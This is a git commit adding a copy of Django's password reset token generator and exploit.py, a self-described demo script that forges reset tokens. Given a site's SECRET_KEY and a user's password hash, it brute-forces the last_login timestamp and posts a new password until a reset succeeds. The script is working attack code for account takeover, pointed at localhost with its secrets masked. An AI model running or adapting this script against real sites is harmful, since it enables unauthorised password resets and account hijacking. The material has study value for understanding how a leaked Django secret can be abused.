Initial commit

alextousss · alextousss · commit ad8519a7a664 · 2018-11-07T21:45:06.000+01:00
diff --git a/PasswordResetTokenGenerator.py b/PasswordResetTokenGenerator.py
@@ -0,0 +1,60 @@
+# Directly coming from Django source code
+
+from django.utils.crypto import constant_time_compare, salted_hmac
+from django.utils.http import base36_to_int, int_to_base36, urlsafe_base64_encode, urlsafe_base64_decode
+
+from datetime import date, datetime
+
+class PasswordResetTokenGenerator:
+    """
+    Strategy object used to generate and check tokens for the password
+    reset mechanism.
+    """
+    key_salt = "django.contrib.auth.tokens.PasswordResetTokenGenerator"
+
+    def __init__(self, SECRET_KEY):
+        self.secret = SECRET_KEY
+
+    def make_token(self, user):
+        """
+        Return a token that can be used once to do a password reset
+        for the given user.
+        """
+        return self._make_token_with_timestamp(user, self._num_days(self._today()))
+
+    def _make_token_with_timestamp(self, user, timestamp):
+        # timestamp is number of days since 2001-1-1.  Converted to
+        # base 36, this gives us a 3 digit string until about 2121
+        ts_b36 = int_to_base36(timestamp)
+        hash_string = salted_hmac(
+            self.key_salt,
+            self._make_hash_value(user, timestamp),
+            secret=self.secret,
+        ).hexdigest()[::2]  # Limit to 20 characters to shorten the URL.
+        return "%s-%s" % (ts_b36, hash_string)
+
+    def _make_hash_value(self, user, timestamp):
+        """
+        Hash the user's primary key and some user state that's sure to change
+        after a password reset to produce a token that invalidated when it's
+        used:
+        1. The password field will change upon a password reset (even if the
+           same password is chosen, due to password salting).
+        2. The last_login field will usually be updated very shortly after
+           a password reset.
+        Failing those things, settings.PASSWORD_RESET_TIMEOUT_DAYS eventually
+        invalidates the token.
+        Running this data through salted_hmac() prevents password cracking
+        attempts using the reset token, provided the secret isn't compromised.
+        """
+        # Truncate microseconds so that tokens are consistent even if the
+        # database doesn't support microseconds.
+        login_timestamp = '' if user.last_login is None else user.last_login.replace(microsecond=0, tzinfo=None)
+        return str(user.pk) + user.password + str(login_timestamp) + str(timestamp)
+
+    def _num_days(self, dt):
+        return (dt - date(2001, 1, 1)).days
+
+    def _today(self):
+        # Used for mocking in tests
+        return date.today()
diff --git a/exploit.py b/exploit.py
@@ -0,0 +1,50 @@
+# coding: utf8
+
+# Demo of django reset token bruteforce exploit
+
+from PasswordResetTokenGenerator import PasswordResetTokenGenerator
+from django.utils.encoding import force_bytes, force_text
+from django.utils.http import base36_to_int, int_to_base36, urlsafe_base64_encode, urlsafe_base64_decode
+from datetime import date, datetime
+import time
+import requests
+
+
+if __name__ == "__main__":
+
+    HASHED_PASS = "pbkdf2_sha256$100000$**************************************************"
+    SECRET_KEY  = '*************************************'
+    HOME_URL = "localhost:8000"
+    RESET_TOKEN_URL = "localhost:8000/account/password_reset_confirm/"
+    PK          = 42
+
+
+    client = requests.Session()
+    client.get(HOME_URL)
+
+    payload = {
+        'csrfmiddlewaretoken': client.cookies['csrftoken'],
+        'new_password1': 'michelmichel',
+        'new_password2': 'michelmichel',
+    }
+
+    start_attack_timestamp = time.time()
+
+    i = 0
+    while True:
+        print("{}/? : {} hours scanned".format(i, i / 3600))
+
+        class User:
+            def __init__(self):
+                self.password = HASHED_PASS
+                self.pk       = PK
+                self.last_login = datetime.fromtimestamp(start_attack_timestamp - i)
+
+        uid   = force_text(urlsafe_base64_encode(force_bytes(User().pk)))
+        token = PasswordResetTokenGenerator(SECRET_KEY).make_token(User())
+        url   = RESET_TOKEN_URL + "{}/{}/".format(uid, token)
+        result = client.post(url, data=payload).text
+        if not "Confirm" in result:  # If we're not on the "Confirm your new password .. " page
+            print("Done : Password reset")
+            break
+        i += 1
